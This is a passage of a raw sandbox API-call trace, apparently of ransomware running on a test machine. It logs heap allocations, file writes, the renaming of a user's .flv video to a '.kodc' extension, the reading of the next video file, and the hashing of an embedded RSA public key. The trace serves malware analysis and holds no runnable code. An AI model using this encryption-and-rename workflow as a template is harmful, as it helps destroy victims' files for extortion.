(HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c778 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ce0 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c7c0 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cf8 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d28 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d40 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.498] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d28 | out: hHeap=0x630000) returned 1 [0100.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d40 | out: hHeap=0x630000) returned 1 [0100.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d40 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7d28 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d40 | out: hHeap=0x630000) returned 1 [0100.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d28 | out: hHeap=0x630000) returned 1 [0100.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.500] GetCurrentThreadId () returned 0x42c [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6ec8 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.500] GetCurrentThreadId () returned 0x42c [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d28 [0100.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d40 [0100.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d10 [0100.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d58 [0100.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0100.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d28 | out: hHeap=0x630000) returned 1 [0100.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d28 [0100.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0100.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d28 | out: hHeap=0x630000) returned 1 [0100.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d58 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d40 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d10 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cf8 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c7c0 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.506] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x11b27, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x11b27, lpOverlapped=0x0) returned 1 [0100.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.506] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11b2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.507] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.507] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.507] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.507] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.508] CloseHandle (hObject=0x5cc) returned 1 [0100.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0100.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.510] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\T37HFV.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\t37hfv.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\T37HFV.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\t37hfv.flv.kodc")) returned 1 [0100.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.511] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.512] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x619e0b80, ftCreationTime.dwHighDateTime=0x1d5b9e3, ftLastAccessTime.dwLowDateTime=0x91446e70, ftLastAccessTime.dwHighDateTime=0x1d5bcf8, ftLastWriteTime.dwLowDateTime=0x91446e70, ftLastWriteTime.dwHighDateTime=0x1d5bcf8, nFileSizeHigh=0x0, nFileSizeLow=0x1075c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui4peF.flv", cAlternateFileName="")) returned 1 [0100.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.512] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ui4peF.flv") returned=".flv" [0100.512] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ui4peF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ui4pef.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.513] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=67420) returned 1 [0100.513] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.517] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10736, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.517] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.518] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.518] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1075c, lpOverlapped=0x0) returned 1 [0100.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.520] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.521] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.521] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.521] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.521] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.521] GetLastError () returned 0x0 [0100.521] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.521] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 